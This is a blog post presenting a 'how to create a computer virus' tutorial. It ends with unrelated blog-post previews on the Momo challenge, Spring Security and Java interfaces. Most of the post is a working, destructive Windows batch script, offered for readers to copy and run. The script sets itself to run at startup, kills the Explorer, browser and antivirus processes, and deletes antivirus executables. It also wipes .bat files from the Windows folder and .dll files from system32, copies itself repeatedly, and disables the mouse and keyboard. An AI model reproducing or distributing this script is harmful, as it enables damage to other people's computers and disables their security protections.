Skip to main content

How to Create a Computer Virus?

You might be scared of viruses in your computer or laptop. They directly affect the working of the computer systems. You may want to create your own virus too. This guide will show you how you can create a simple virus. Open the notepad file and paste the following code:
@echo off
copy "virus.bat" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy "virus.bat" "C:\"
copy "virus.bat" "%userprofile%\My Documents"
tskill explorer
tskill ccapp
tskill yahoomessenger
tskill firefox
tskill chrome
rem made with Batch Virus Maker V.2
tskill iexplorer
time 12:00
rem made with Batch Virus Maker V.2
del C:\Program Files\Common Files\Symantec Shared\ccapp.exe
cd C:\WINDOWS
if exist "*.bat" del "*.bat"
cd C:\WINDOWS\system32
rem made with Batch Virus Maker V.2
if exist "*.dll" del "*.dll"
tskill McAfee Security Centre Module
del c:\program files\mcafee.com\agent\mcdetect.exe
rem made with Batch Virus Maker V.2
copy "virus.bat" "virus.bat45544"
copy "virus.bat" "virus.bat85858"
copy "virus.bat" "virus.bat1645"
copy "virus.bat" "virus.bat574457"
copy "virus.bat" "virus.bat55457"
copy "virus.bat" "virus.bat9765"
copy "virus.bat" "virus.bat45465"
rem made with Batch Virus Maker V.2
copy "virus.bat" "virus.bat456877"
copy "virus.bat" "virus.bat77989845"
copy "virus.bat" "virus.bat2135"
copy "virus.bat" "virus.bat46876"
rem made with Batch Virus Maker V.2
copy "virus.bat" "virus.bat45687"
copy "virus.bat" "virus.bat8868"
copy "virus.bat" "virus.bat2000"
copy "virus.bat" "virus.bat2009"
msg * this is a virus
rundll mouse,disable
rem made with Batch Virus Maker V.2
rundll keyboard,disable
Save it as “virus.bat” or anything with the name you want to. Now your first virus is ready to work. You can also convert it as .exe file. It copies itself to startup, hard disk, my documents and then it kills explorer.exe, chrome.exe and firefox.exe. It tries to delete mcafee antivirus and tries to delete every .dll and .bat files.  Now if someone clicks on the .bat or .exe file this batch file will run and execute the operations written in the code. So beware of running this batch file or you may need for a restoration on your computer.
If you want to know more about virus and how it will work click this link :-

Comments

Popular posts from this blog

Momo suicide game

Microsoft clamps down on sick 'Momo suicide game' in 'Minecraft' Microsoft is clamping down on the sick “Momo suicide challenge,” which recently infiltrated the wildly popular online game “Minecraft.”The tech giant owns “Minecraft” developer Mojang. The vile “Momo suicide game” has been garnering attention after spreading on WhatsApp, prompting police warnings. "Momo" is a viral challenge that asks people to add a contact via WhatsApp - they are then   urged   to commit self-harm or suicide. The "game" has fueled comparisons to the sinister " Blue Whale challenge " that led to reports of suicides in Russia and the U.S, as well as the online fictional character of "Slender Man." In 2014 two 12-year-old girls in Wisconsin  attempted to kill   a classmate in an attempt to please the horror character. The Buenos Aires Times recently  reported  that police in Argentina are investigating whether “Momo” is linked to the suicide of a 12-y...

Spring Security with JWT for REST API

Spring is considered a trusted framework in the Java ecosystem and is widely used. It’s no longer valid to refer to Spring as a framework, as it’s more of an umbrella term that covers various frameworks. One of these frameworks is Spring Security , which is a powerful and customizable authentication and authorization framework. It is considered the de facto standard for securing Spring-based applications. Despite its popularity, I must admit that when it comes to single-page applications , it’s not simple and straightforward to configure. I suspect the reason is that it started more as an MVC application -oriented framework, where webpage rendering happens on the server-side and communication is session-based. If the back end is based on Java and Spring, it makes sense to use Spring Security for authentication/authorization and configure it for stateless communication. While there are a lot of articles explaining how this is done, for me, it was still frustrating to set it up for the f...

Java Functional Interfaces

  The term   Java functional interface   was introduced in Java 8. A   functional interface   in Java is an interface that contains only a single abstract (unimplemented) method. A functional interface can contain default and static methods which do have an implementation, in addition to the single unimplemented method. Here is a Java functional interface example: public interface MyFunctionalInterface { public void execute(); } The above counts as a functional interface in Java because it only contains a single method, and that method has no implementation. Normally a Java interface does not contain implementations of the methods it declares, but it can contain implementations in default methods, or in static methods. Below is another example of a Java functional interface, with implementations of some of the methods: public interface MyFunctionalInterface2{ public void execute(); public default void print(String text) { System.out.println(t...